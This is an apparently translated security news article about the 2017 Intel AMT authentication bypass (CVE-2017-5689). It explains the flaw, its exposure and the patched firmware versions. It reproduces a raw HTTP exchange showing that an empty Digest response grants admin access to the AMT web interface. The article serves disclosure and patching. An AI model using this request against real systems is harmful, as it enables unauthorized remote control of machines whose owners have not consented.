Vulnerability in Intel AMT was more serious than thought



    On May 1, 2017, Intel reported a critical vulnerability in Active Management Technology (AMT) (INTEL-SA-00075, aka CVE-2017-5689 ). Vulnerability found Maxim Malyutin from the company Embedi, but kept it secret at the request of Intel before the official announcement.

    Intel AMT is a hardware technology that provides remote and out-of-band (via independent TCP / IP auxiliary channel) access to manage computer settings and security regardless of the power state (remote on / off of the computer) and the OS state. The technology is integrated into the chipset. If you use it as an anti-rootkit for scanning the RAM and PC drives, then there are no ways to bypass such protection. Worse, remote queries to the AMT are not logged in the system log.

    Now a request to Shodan issues more than 8500 systems with open ports AMT. For some BIOS firmwares, patches that fix the bug in AMT have not yet been released.

    The AMT technology allows system administrators to remotely perform various actions on the system: turn on off computers, change bootloader code, control input devices, executable programs, etc. In fact, AMT allows you to perform all actions that you can do remotely. having physical access to the PC.

    After reading the description of the technology, you can begin to fantasize what possibilities the hacker has, having remote access to an off computer with the AMT technology. So, your fantasies were true . Remote access to AMT is provided via the web interface in the browser. As Maxim found out, for access digest authenticationAny cryptographic hash is suitable or not at all. That is, the corresponding field in the authorization form can be left empty.

    It doesn't even look like a backdoor, because who will implement it in such a clumsy way?

    Vulnerable systems after 2010-2011 release (a list of vulnerable firmware, see below). This is 100% not RCE, but rather a logical vulnerability. Maxim Malyutin believes that there are several attack vectors, as an attacker could use this vulnerability, perhaps even on Intel systems without Intel AMT support.

    “Authentication is still working, Malyutin explained . “We just found a way around it.”

    Through a web browser, you can get full access to the AMT functions, as if you recognize the admin password in the system. Here is how it is done using the local proxy at 127.0.0.1:16992:

    GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest
realm="Digest:048A0000000000000000000000000000",
nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"
Content-Type: text/html
Server: AMT
Content-Length: 678
Connection: close
GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Authorization: Digest username="admin",
realm="Digest:048A0000000000000000000000000000",
nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="",
qop=auth, nc=00000001, cnonce="60513ab58858482c"
HTTP/1.1200 OK
Date: Thu, 4 May 201716:09:17 GMT
Server: AMT
Content-Type: text/html
Transfer-Encoding: chunked
Cache-Control: no cache
Expires: Thu, 26 Oct 199500:00:00 GMT
04E6

    A few days after the information was disclosed, Tenact released an exploit to exploit a critical vulnerability with an increase in AMT privileges. The company offered to use this tool to detect vulnerable systems in its network. So that the sysadmins know where to install new firmware versions. The exploit is implemented as a Nessus plugin .

    On the same days, the largest server and personal computer manufacturers released official security messages for their customers: a message from HP , from Dell , from Lenovo , from Fujitsu . There will be detailed information about vulnerable firmware and links to updated versions will appear as soon as they become available.

    List of patched firmware from Intel
    Vulnerable
    firmware versions    		Corresponding
    CPU generation    		Patched
    firmware
    6.0.xx.xxxx

    		1 st Gen Core

    		6.2.61.3535

    6.1.xx.xxxx

    		6.2.61.3535

    6.2.xx.xxxx

    		6.2.61.3535

    7.0.xx.xxxx

    		2 nd Gen Core

    		7.1.91.3272

    7.1.xx.xxxx

    		7.1.91.3272

    8.0.xx.xxxx

    		3 rd Gen Core

    		8.1.71.3608

    8.1.xx.xxxx

    		8.1.71.3608

    9.0.xx.xxxx

    		4 th Gen Core

     

    		9.1.41.3024

    9.1.xx.xxxx

    		9.1.41.3024

    9.5.xx.xxxx

    		9.5.61.3012

    10.0.xx.xxxx

    		5 th Gen Core

    		10.0.55.3000

    11.0.xx.xxxx

    		6 th Gen Core

    		11.0.25.3001

    11.0.22.3001

    11.0.18.3003

    11.5.xx.xxxx

    		7 th Gen Core

    		11.6.27.3264

    11.6.xx.xxxx

    		11.6.27.3264

    11.6.12.3202

    Intel has released the official tool to check the system for vulnerabilities under Windows 7/10, as well as a guide for its use.
    Tags:

    Also popular now: